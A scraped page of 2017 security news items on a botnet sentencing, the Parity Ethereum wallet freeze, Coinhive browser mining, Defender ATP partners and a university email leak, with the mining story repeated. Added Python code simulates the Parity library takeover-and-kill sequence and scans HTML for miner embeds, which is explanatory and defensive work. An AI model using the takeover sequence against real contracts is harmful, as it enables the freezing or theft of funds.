STE WILLIAMS

No jail time for botnet creator who promises to go straight

A US federal court has given a break to yet another botnet operator who claims that he’s leaving cybercriminality behind.

Sean Tiernan, 29, of Santa Clara, Calif., was sentenced last week by a US District Court in Pittsburgh to two years’ probation but no prison time for his involvement with a spam botnet, beginning in 2011.

According to the Department of Justice, Tiernan was involved in the development of the botnet from at least 1 August 2011 until he was raided by the FBI 14 months later.

Tiernan would sell access to his botnet to those who sought to send out these commercial electronic email messages for their own personal commercial gain. At the time of the search of Tiernan’s residence and computer via a search warrant on or about 1 October 2012, over 77,000 bots, or infected computers, were active in Tiernan’s botnet.

Tiernan’s lawyers argued – obviously successfully – that their client deserved leniency for several reasons. As soon as the FBI raided his residence, he confessed and began cooperating with them. A year later, he confessed to a CAN SPAM (Controlling the Assault of Non-Solicited Pornography and Marketing Act of 2003) violation.

As Bleeping Computer reported, his lawyer also argued that while the damage caused by the botnet was real, it was relatively minor – it did not steal the financial data of the victims, it did not extort them, the malware was easily removable and it only collected IP addresses, which courts no longer consider to be private data.

They noted that the spam traffic generated was just advertising, not malware-laden files, and that he didn’t make all that much profit and used it for a worthy cause – his college education. He was a student at Cal Poly when the FBI showed up at his door.

The defense also argued for leniency because Tiernan was just a kid when he got involved. They said his father was a computer consultant, he learned to code when he was a teen and was still a minor when his involvement with the botnet began.

But by 2011 he was into his 20s – a legal adult. Eligible to drink, to vote, to rent a car, to execute contracts and all other adult privileges. Which would seem to make him ineligible to claim adolescence as a defense.

However, his lawyer said he now intends to go straight – that he is enrolled in the Stanford CyberSecurity Graduate Program and is working to become a Certified Information Systems Security Professional (CISSP). He has also “been employed continuously with a well-known company in the cybersecurity sector.” Perhaps well-known, but neither the company nor Tiernan’s job title was named.

Jody Westby, CEO of Global Cyber Risk and a cybercrime consultant, was not impressed with the sentence.

It reflects a gross lack of awareness and understanding by the judge of [cybercrime] incidents and the harm they cause. Every one of the 77,000 computers he controlled was infected with an unauthorized software program that allowed the computer to be remotely accessed and used to send spam.

That is not only a criminal violation but also a trespass to chattels and a misappropriation of the proxy computers and use of their systems and networks. This sends exactly the wrong message to cybercriminals.

Tiernan is, of course, not the first, or the most famous, cybercriminal to turn to legitimate work. Kevin Mitnick, once known as “the world’s most-wanted hacker,” and who served five years in prison for multiple computer-related crimes, is now head of Mitnick Security Consulting and chief hacking officer at KnowBe4.

Mustafa Al-Bassam, a founding and former member of LulzSec, who went by the alias tFlow, joined Secure Trading, a UK-based online payment firm, last year as a part-time security adviser while working on a degree in computer science at King’s College, London.

He was arrested in July 2011, and received a suspended 20-month prison sentence, was ordered to perform 500 hours of community service and banned from the internet for two years for his role in LulzSec.

And Hector “Sabu” Monsegur, another LulzSec founder, who later helped take it down, was arrested by the FBI in 2011, but the arrest was kept secret and he was an informant for the agency for the next 10 months.

About a year ago, he joined Rhino Security Labs in Seattle.

Westby doesn’t oppose second chances for cybercriminals, but said it “should not be easy.”

They are criminals. They could teach or do research but it should take a long while to prove they are reformed and a valued employee before they are allowed to get near a client’s systems. It is one thing to give a person a chance and another to simultaneously put a client at risk.

She added that if Tiernan is going to be working on client accounts, his history should be disclosed first. And she said the company should probably be in touch with its insurer, to make sure it would cover “any wrongful actions undertaken by that person.”

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/hkt_fDYPwKo/

$300m… deleted! How a tiny bug flushed away a fortune

A month or so ago we wrote about the ways you can lose in the cryptocurrency game – through the volatility of its value and through vulnerable exchanges (websites that store your cryptocash) getting hacked.

Turns out there’s another way – the digital equivalent of a bank freeze, which in this case was a “wallet” freeze. As reported in multiple outlets Tuesday, something in the range of $150m to $300m of ether, the digital token of the Ethereum blockchain – second to Bitcoin as the most popular cryptocurrency – is now frozen.

The cash is holed up in cryptocurrency multi-sig wallets (wallets requiring more than one owner to “sign” a transaction before it can proceed) created after 20 July using a library provided by Parity Technologies Ltd.

Reportedly the frozen cash includes $90m belonging to Gavin Wood, Parity founder and former core developer of Ethereum.

Parity issued a Critical security alert Tuesday warning of a vulnerability in the Parity Wallet library contract. The code to create multi-sig wallets had been updated on 20 July to fix a bug that had been exploited the previous day, a vulnerability which resulted in $32m in ether being looted from multi-sig wallets by hackers.

But, the new code contained another bug.

(I)t was possible to turn the Parity Wallet library contract into a regular multi-sig wallet and become an owner of it by calling the initWallet function.

It would seem that issue was triggered accidentally 6th Nov 2017 02:33:47 PM +UTC and subsequently a user suicided the library-turned-into-wallet, wiping out the library code which in turn rendered all multi-sig contracts unusable since their logic (any state-modifying function) was inside the library.

In layman’s terms what happened was the digital equivalent of accidentally walking off with a sack full of wallets containing millions of dollars and then throwing it in the garbage disposal by mistake.
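The failure the alert describes, replayed as an added toy model (Python, not Parity’s Solidity): a wallet proxy delegates its logic to a shared library, the library’s init_wallet can be run against the library’s own never-initialised storage, and once a self-declared owner kills it every wallet keeps its state but loses its logic. The hardened variant simply initialises the library’s own storage at deployment. All names are invented for the model.

```python
from dataclasses import dataclass, field


class Revert(Exception): """A failed call, the equivalent of an EVM revert."""


@dataclass
class Account:
    address: str
    code: object = None                       # contract logic; None once destroyed
    storage: dict = field(default_factory=dict)


class World:
    def __init__(self):
        self.accounts = {}

    def deploy(self, address, code):
        acct = self.accounts[address] = Account(address, code)
        getattr(code, "on_deploy", lambda a: None)(acct)
        return acct

    def call(self, address, sender, fn, *args):
        acct = self.accounts[address]
        if acct.code is None:
            return None   # EVM: calling a codeless address succeeds with empty return data
        return acct.code.handle(self, acct, sender, fn, *args)


class WalletLibrary:
    """The shared logic every wallet delegates to (toy model, not Parity's code)."""

    def __init__(self, guarded):
        self.guarded = guarded

    def on_deploy(self, acct):
        # Hardened variant: mark the library's own storage initialised at deployment.
        if self.guarded:
            acct.storage["initialized"] = True

    def handle(self, world, acct, sender, fn, *args):
        return getattr(self, fn)(world, acct, sender, *args)

    def init_wallet(self, world, acct, sender, owners):
        if acct.storage.get("initialized"):   # only blocks re-initialisation
            raise Revert("already initialised")
        acct.storage["initialized"] = True
        acct.storage["owners"] = set(owners)

    def is_owner(self, world, acct, sender, who):
        return who in acct.storage.get("owners", set())

    def kill(self, world, acct, sender):
        if sender not in acct.storage.get("owners", set()):
            raise Revert("not an owner")
        world.accounts[acct.address].code = None   # selfdestruct: code is gone


class Wallet:
    """A thin proxy: delegatecall runs library code on the wallet's own storage."""

    def __init__(self, library_address):
        self.library_address = library_address

    def handle(self, world, acct, sender, fn, *args):
        lib = world.accounts[self.library_address]
        if lib.code is None:
            # delegatecall to a destroyed library succeeds with empty return data;
            # the real contracts decoded that as leftover memory, hence the reported TRUE.
            return None
        return lib.code.handle(world, acct, sender, fn, *args)


def run_incident(guarded):
    """Replay the page's sequence of events and report what each side observes."""
    world = World()
    world.deploy("LIB", WalletLibrary(guarded))
    world.deploy("WALLET", Wallet("LIB"))
    world.call("WALLET", "alice", "init_wallet", ["alice", "bob"])

    # 1. A stranger calls init_wallet on the LIBRARY address, not on a wallet.
    try:
        world.call("LIB", "stranger", "init_wallet", ["stranger"])
        took_over = True
    except Revert:
        took_over = False

    # 2. As the library's "owner" the stranger can now kill it.
    if took_over:
        world.call("LIB", "stranger", "kill")

    # 3. Wallets delegating to LIB keep their state but have lost their logic.
    return {
        "library_taken_over": took_over,
        "library_code_present": world.accounts["LIB"].code is not None,
        "wallet_reports_alice_owner": world.call("WALLET", "alice", "is_owner", "alice"),
        "wallet_storage_intact": "alice" in world.accounts["WALLET"].storage["owners"],
    }
```

Running `run_incident(False)` reproduces the stranded-wallet outcome; `run_incident(True)` shows the stranger’s init_wallet reverting and the wallet still answering.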

The he or she (I’ll use “he”) who inadvertently stuffed the money into the garbage, who apparently goes by the Twitter handle @devops199, said he triggered the bug accidentally and reported it through a GitHub ticket.

Under the heading “anyone can kill your contract”, he wrote:

Hello, first of all I’m not the owner of that contract … I made myself the owner of “0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4” contract and killed it, and now when I query the dependent contracts “isowner()” they all return TRUE because the delegate call is made to a dead contract.

I believe someone might exploit.

Later, in a series of tweets, he wrote, among other things, “Will I get arrested for this?” and “I’m eth newbie .. just learning.”

How believable is that?

Well, based on the Twitter account with that handle, he appears to be a brand-brand-new newbie to that platform. His home page says he joined in November 2017. The profile says, “Parity Account (see what I did there? Parody).” As of mid-day Wednesday, he had posted only 39 tweets and was following only 17 others, while having gained 1,411 followers since the account opened.

Of course users, newbie or otherwise, can only make mistakes if software allows them to. Matt Suiche, writing on the Comae Technologies blog, noted a number of software development issues that created the environment for this mistake to occur:

Even though the vulnerable smart-contract was open source and deployed months ago, this bug managed to escape code review done by the Parity team.

Since by design smart-contracts themselves can’t be patched easily, this makes dependencies on third-party libraries very lethal if a mistake happens.

The fact that libraries are global is also arguable; this would be shocking if it was how our daily-use Operating Systems would work.

No matter what the cause, the important thing for users (depositors?), obviously, is whether they can get their money back. And according to most of the online discussion, a “hard fork” may be the only way to do it. A hard fork splits a single cryptocurrency in two, with both the old and new versions remaining valid. In a soft fork, only one blockchain – and therefore one coin – remains valid.

Such a move is controversial. It requires 51% of the entire Ethereum community – not just users of the wallet in question – to agree to create a new blockchain in which a hack, or in this case the freeze, never happened.

That has already been done once, in June 2016, after an Ethereum app called the DAO (Decentralized Autonomous Organization) was hacked and the attacker siphoned off an estimated $50m.

Ethereum inventor Vitalik Buterin tweeted that a hard fork shouldn’t be used in this case. He said the DAO hard fork was justified because the Ethereum ecosystem was “less mature then (and there was) more at stake then as % of all ETH.” And:

[most impt]. Today’s attacker can just move funds, so HF is impossible.

But Jordan Pearson, writing in Motherboard, said a Parity spokesman told him: “At the moment we are looking into every scenario, a hard fork is one of the options.”

And Martin Holst Swende, head of security for the Ethereum Foundation, told CoinDesk that the only way to free up the funds is a hard fork.

There’s unfortunately no way to recreate the code without a hard fork. Any solution which makes the locked funds accessible requires a hard fork.

The current crisis has apparently not affected the value of the currency. While it dropped from about $305 to $290 after the news broke, at mid-afternoon on Wednesday it was back up at $312.

Meanwhile, the warning about cryptocurrency risks that Naked Security’s Paul Ducklin issued more than two years ago seems relevant for yet another reason. Such currency “… generally speaking, (is) not covered by any of the laws relating to currency trading, brokerage, banking and so on,” he wrote.

In other words, if the company to which you entrusted your precious bitcoins suddenly tells you, “So sorry, they seem to have vanished,” then, well, that’s that: you’re out of luck.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/X_5K03IBg6U/

Microsoft pals up with partners for threat-hunting

Windows Defender Advanced Threat Protection first landed as a public preview in September, and now that it’s generally available, Redmond has announced a bunch of partners to give it cross-platform support: Bitdefender for Linux and macOS, Lookout for iOS and Android, and Ziften for macOS and Linux.

With Bitdefender’s Gravityzone Cloud integration arriving in public preview today, El Reg spoke to the company’s group product manager Deepakeswaran Kolingivadi – DK – to find out what Redmond wanted.

DK told us the demand came from Microsoft’s enterprise customers, who, having seen Microsoft’s code, wanted the system to cover non-Windows devices.

“When MS pitched their Windows Defender Advanced Threat Protection (ATP) solution to their customers, they liked seeing Windows-based malware detection … they expressed the need to see that information in the same console from Mac/Linux,” DK told The Register.

In particular, he said, macOS machines were nominated as popular in the executive suites, and Microsoft didn’t have coverage of them. That’s made them an attractive target, and “in the last couple of years we’ve seen a spike in attacks”.

That contact, “around four or five months ago”, set off the integration effort, and DK said the two companies’ engineers got the work completed within a quarter.

[Figure: Bitdefender info through Windows Defender ATP]

He said the current capabilities will be expanded, with Bitdefender increasingly seeing “platform-agnostic script-based attacks” that can affect Windows and macOS alike, and defences against those threats are part of the company’s plans.

Announcing the partners, Microsoft said Lookout and Ziften products for Windows Defender ATP will land soon. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/windows_defender_atp_partners/

Not even ordering pizza is safe from the browser crypto-mining scourge

A total of 2,531 of the top 3 million websites (1 in 1,000) are running the Coinhive miner, according to new stats from analytics firm Red Volcano.

BitTorrent sites and the like were the main offenders but the batch also included the Ecuadorian Papa John’s Pizza website [see source code].

JavaScript-based Coinhive crypto-mining software on websites is bad news for surfers because the technology can suck up power and resources without user consent.

Coinhive launched a service in September that allowed mining of a digital currency called Monero directly within a web browser. The simplicity of the Coinhive API integration made the approach successful but partly due to several initial oversights – most notably through a failure to enforce an opt-in process to establish user consent – the technology has been widely abused.

[Figure: Drive-by mining is the new drive-by downloading – source: Malwarebytes white paper]

Some less than salubrious web portals started to run the Coinhive API in non-throttled mode, tying up users’ machines in the process. In other cases hackers planted crypto-mining software on third-party websites, a practice known as either crypto-jacking or drive-by mining.

[Figure: Top 10 countries exposed to drive-by mining; US and Spain top the list of countries most impacted – source: Malwarebytes]

Instances of crypto-mining code on webpages or buried within rogue smartphone apps keep rolling in.

Security vendor Ixia warns two games on the Google Play store, Puzzle and Reward Digger, by AK Games are actively mining cryptocurrency from thousands of infected Android mobile phones.

Android cryptocurrency mining malware can be quite lucrative for cybercriminals. For instance, total profits earned on one specific Magicoin wallet are equal to $1,150 at current exchange rates, according to Ixia’s report. This makes cryptominers the next generation of adware software, Ixia concluded.

Elsewhere Netskope discovered a Coinhive miner installed as a plugin on a tutorial webpage for Microsoft Office 365 OneDrive for Business. The offending website – https://www.sky-future[.]net – removed the Coinhive plugin after it was notified about the issue. “The tutorial webpage hosted on the website was saved to the cloud and then shared within an organisation,” according to Netskope.

Microsoft told El Reg that its “security software detects and blocks this application”. Ad blockers and antivirus programs have also added features that block browser mining but few security watchers think this alone will bring the issue to heel. The opportunity to coin in cryptocurrency by enslaving the machines of others is just too tempting for unscrupulous websites and black hats. ®
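An added detection example (not from the article, Red Volcano or Malwarebytes): a small offline scanner that flags Coinhive-style embeds in page HTML and reports whether the miner runs in the non-throttled mode the article describes. The loader host, the `CoinHive.Anonymous`/`CoinHive.User` constructors and the `throttle` option are assumed from the service’s public documentation of the time; the sample pages are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts whose script loaders mark a Coinhive embed (assumed from the service's
# public integration docs at the time; extend for other in-browser miners).
MINER_HOSTS = ("coinhive.com",)
# `new CoinHive.Anonymous(siteKey, {throttle: x})` was the documented way to start
# the miner; throttle 0 (the default) means the tab mines flat out.
MINER_CTOR = re.compile(r"new\s+CoinHive\.(Anonymous|User)\s*\(", re.I)
THROTTLE = re.compile(r"throttle\s*:\s*([0-9]*\.?[0-9]+)")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline = [], []
        self._buf = None          # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":       # HTMLParser already lower-cases tag names
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def _is_miner_host(src):
    # Absolute and protocol-relative URLs parse to a hostname; page-relative
    # paths do not and are left to the inline-script check below.
    host = urlparse(src if "//" in src else "//" + src).hostname or ""
    return any(host == h or host.endswith("." + h) for h in MINER_HOSTS)


def scan_html(html):
    """Return a list of findings; an empty list means no miner embed was seen."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        if _is_miner_host(src):
            findings.append({"kind": "loader", "src": src})
    for body in parser.inline:
        ctor = MINER_CTOR.search(body)
        if not ctor:
            continue
        throttle = THROTTLE.search(body)
        value = float(throttle.group(1)) if throttle else 0.0
        findings.append({
            "kind": "miner",
            "api": ctor.group(1),
            "throttle": value,
            "unthrottled": value == 0.0,   # the "non-throttled mode" the article describes
        })
    return findings


# Constructed sample pages (not real site content): one with a miner dropped
# into the footer, one clean.
MINING_PAGE = """<html><body><h1>Order pizza</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');
  miner.start();
</script></body></html>"""

CLEAN_PAGE = """<html><body><h1>Order pizza</h1>
<script src="/static/app.js"></script>
<script>window.cart = [];</script></body></html>"""


if __name__ == "__main__":
    for name, page in (("mining", MINING_PAGE), ("clean", CLEAN_PAGE)):
        print(name, scan_html(page))
```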

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/crypto_mining_sitrep/

Not even ordering pizza is safe from the browser crypto-mining scourge

A total of 2,531 of the top 3 million websites (1 in 1,000) are running the Coinhive miner, according to new stats from analytics firm Red Volcano.

BitTorrent sites and the like were the main offenders but the batch also included the Ecuadorian Papa John’s Pizza website [see source code].

JavaScript-based Coinhive crypto-mining software on websites is bad news for surfers because the technology can suck up power and resources without user consent.

Coinhive launched a service in September that allowed mining of a digital currency called Monero directly within a web browser. The simplicity of the Coinhive API integration made the approach successful but partly due to several initial oversights – most notably through a failure to enforce an opt-in process to establish user consent – the technology has been widely abused.

Drive-by mining

Drive-by mining is the new drive-by downloading [source: Malwarebytes white paper]

Some less than salubrious web portals started to run the Coinhive API in non-throttled mode, tying up users’ machines in the process. In other cases hackers planted code crypto-mining software on third-party websites, a practice known as either crypto-jacking or drive-by mining.

Top 10 countries exposed to drive-by mining

US and Spain top the list of countries most impacted by drive-by mining [source: Malwarebytes]

Instances of crypto-mining code on webpages or buried within rogue smartphone apps keep rolling in.

Security vendor Ixia warns two games on the Google Play store, Puzzle and Reward Digger, by AK Games are actively mining cryptocurrency from thousands of infected Android mobile phones.

Android cryptocurrency mining malware can be quite lucrative for cybercriminals. For instance, total profits earned on one specific Magicoin wallet are equal to $1,150 at current exchange rates, according to Ixia’s report. This makes cryptominers the next generation of adware software, Ixia concluded.

Elsewhere Netskope discovered a Coinhive miner installed as a plugin on a tutorial webpage for Microsoft Office 365 OneDrive for Business. The offending website – https://www.sky-future[.]net – removed the Coinhive plugin after it was notified about the issue. “The tutorial webpage hosted on the website was saved to the cloud and then shared within an organisation,” according to Netskope.

Microsoft told El Reg that its “security software detects and blocks this application”. Ad blockers and antivirus programs have also added features that block browser mining but few security watchers think this alone will bring the issue to heel. The opportunity to coin in cryptocurrency by enslaving the machines of others is just too tempting for unscrupulous websites and black hats. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/crypto_mining_sitrep/

Uni staffer’s health info blabbed in email list snafu

For the second time in five months, The University of East Anglia has been involved in a personal data breach.

Around 300 postgraduate students received an email on Sunday 5 November which contained “personal information about the health of a member of staff”, due to the accidental use of an email distribution list.

UEA’s IT department responded by remotely extracting the email from the accounts to which it had been sent. The Social Sciences Faculty then contacted the students explaining what had happened, requesting that those who had been sent the mistaken email respect the privacy of the individual involved and delete any additional copies that may have been created by auto-forwarding.

In a statement given to the Norwich Evening News, UEA said: “This was unintentional and clearly should not have happened, and the university apologises unreservedly.

“An urgent investigation into how this happened is under way. The university contacted the member of staff to apologise and will be providing support.

“The University will continue with the roll out of our newly created action plan to prevent incidents like this in the future.”

The previous data breach took place in June this year, when details of 191 students’ extenuating circumstances were sent to 298 American Studies undergraduates.

The ICO investigated after UEA referred itself to it, but the university was ruled to have not met the requirements for the commissioner to take action.

We’ve contacted the university and the ICO for comment.

Notification of personal data breaches will become mandatory when the General Data Protection Regulation comes into force from 25 May 2018. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/university_leaks_personal_data_for_second_time_in_five_months/
